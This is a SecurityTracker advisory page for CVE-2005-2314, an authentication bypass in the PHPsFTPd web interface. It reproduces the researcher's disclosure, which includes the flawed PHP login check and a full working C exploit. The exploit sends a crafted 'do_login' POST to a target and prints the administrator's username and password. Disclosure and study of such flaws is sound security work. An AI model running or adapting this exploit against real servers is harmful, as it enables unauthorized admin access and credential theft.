SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHPsFTPd Vendors:   phpsftpd.sourceforge.net
PHPsFTPd Grants Administrative Access to Remote Users
SecurityTracker Alert ID:  1014481
SecurityTracker URL:  http://securitytracker.com/id/1014481
CVE Reference:   CVE-2005-2314   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jul 14 2005
Impact:   User access via network

Version(s): 0.2 - 0.4
Description:   A vulnerability was reported in PHPsFTPd. A remote user can obtain administrative access.

A remote user can submit an HTTP POST request with specially crafted 'do_login' contents to the 'user.php' script to gain access to the application.

Stefan Lochbihler reported this vulnerability.

Impact:   A remote user can obtain administrative access to the target application.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpsftpd.sourceforge.net/ (Links to External Site)
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHPsFTPd - Admin password leak


Author:  	Stefan Lochbihler
Date:    	11. Juli 2005
Affected 	Software: PHPsFTPd
Software 	Version: 0.2 -> 0.4
Software 	URL: http://phpsftpd.sourceforge.net/
Attack:  	Admin password leak


about PHPsFTPd:
PHPsFTPd is a web based administration and configuration interface
for the SLimFTPd ftp serverIt can be used an any http server that
suports PHP and does not need a database or adittional php modules,
only SlimFTPD It allows the administrators of the ftp server to
configurate it from within this interface as opposed to its native
ascii conf.file It shows statistics about the users that accesed
the server , the files that were downloaded , server breakdowns etc


Hi there again

during a look at the code of the PHPsFTPd Project i find out that it
is possible to get the Admins Username & Password. This happens
when we send a specially crafted POST Request to the user.php script.
The reason of the leakness is at the inc.login.php script.
When you take a look at the code below you see that the code will exit
if there is no logged session or we dont try to logout.
But when we POST the do_login var with some stuff in it execution goes on.


snipped from inc.login.php


//login form
if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) &&
!isset($_POST['do_login'])) {
		echo "<p>&nbsp;</p>
		<form action='index.php' method='post'>
		<img src=gfx/ico_notice.gif align=absmiddle> Please login with admin
pass<br>
		<input class=td type='password' name='pass'>
		<input class=button type='submit' name='login' value='Login'>
		</form>
		";
		die;
}





exploit:
Print the admins username & password



// PHPsFTPd Admin Password Leak
// tested on a WinXP SP1 box



#include "stdafx.h"
#include "stdio.h"
#include "winsock2.h"

#pragma comment (lib,"ws2_32")

#define PORT 80
#define rootdir "/phpsftpd/"


typedef unsigned long ulong;


void usage(char *);
ulong checkhost(char *);



ulong checkhost(char *host)
{
struct hostent *hp;
ulong host_ip=0;

host_ip=inet_addr(host);
if(host_ip==INADDR_NONE){
     hp=gethostbyname(host);
if(!hp){
      printf("unable to resolv host...\n");
	exit(1);
	}

    host_ip= *(ulong*)hp->h_addr;

}

return host_ip;

}


void usage (char *progn){

printf("Usage[%s]: www.targethost.com\n",progn);
exit(0);

}




int main(int argc, char* argv[])
{

    WSADATA wsa;
    SOCKET client;
    WORD wsVersion;

    char httpRequest[1024];
    char recvBuffer[1024];

    char *p;

    struct sockaddr_in addr;
    int err=0,recvSize=0;

    printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:steve01@chello.at\n");

      if(argc<2)
       usage(argv[0]);
	

wsVersion=MAKEWORD(2,0);

    if(err=WSAStartup(wsVersion,&wsa)){
     printf("Error: WSAStartup\n");
     exit(0);
}


     client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
     if(client==INVALID_SOCKET){
     printf("Error: Create Socket\n");
     exit(0);
}


addr.sin_addr.s_addr = checkhost(argv[1]);
addr.sin_port = htons(PORT);
addr.sin_family = AF_INET;


memset(httpRequest,'\0',sizeof(httpRequest));

strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"users.php?action=edit&username=root
HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT
MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Host:
www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Type:
application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Length:
13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);

err=connect(client,(SOCKADDR*)&addr,sizeof(addr));

//Get Http Stuff
send(client,httpRequest,strlen(httpRequest),0);
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';
//Get username & password
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';


//shit when anyone use a 0x20 on his password
p=strstr(recvBuffer,"value=");
printf("Username:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);

p=strstr(p,"value=");

printf("\n");
printf("Password:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);
     	
	
closesocket(client);
WSACleanup();

printf("\n");
return 0;
}


Vendor Status: The Vendor is informed !

Discovered (c) by Steve





-- 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC